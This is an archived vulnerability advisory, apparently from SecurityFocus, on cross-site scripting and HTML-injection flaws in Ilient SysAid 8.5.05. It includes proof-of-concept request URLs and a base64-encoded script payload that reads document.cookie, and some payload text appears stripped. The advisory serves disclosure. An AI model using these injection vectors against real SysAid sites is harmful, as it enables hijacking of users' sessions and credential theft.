source: https://www.securityfocus.com/bid/52356/info Ilient SysAid is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input. An attacker could leverage the cross-site scripting issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Attacker-supplied HTML and script code would run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user. Other attacks are also possible. Ilient SysAid 8.5.05 is vulnerable; other versions may also be affected. HTML injection: Administratorsonline

1Users
JulienAhrens Cross-site scripting: http://www.example.com:8080/sysaid/CustomizeListView.jsp?listName=Assets&listViewName= or base64 encoded: http://www.example.com:8080/sysaid/CustomizeListView.jsp?listName=Service%20Requests&srType=1&listViewName= () BASE64@PHNjcmlwdD5hb GVydChlc2NhcGUoZG9jdW1lbnQuY29va2llKSk8L3NjcmlwdD4= Non-persistent(listViewName): Customizelist-Assets-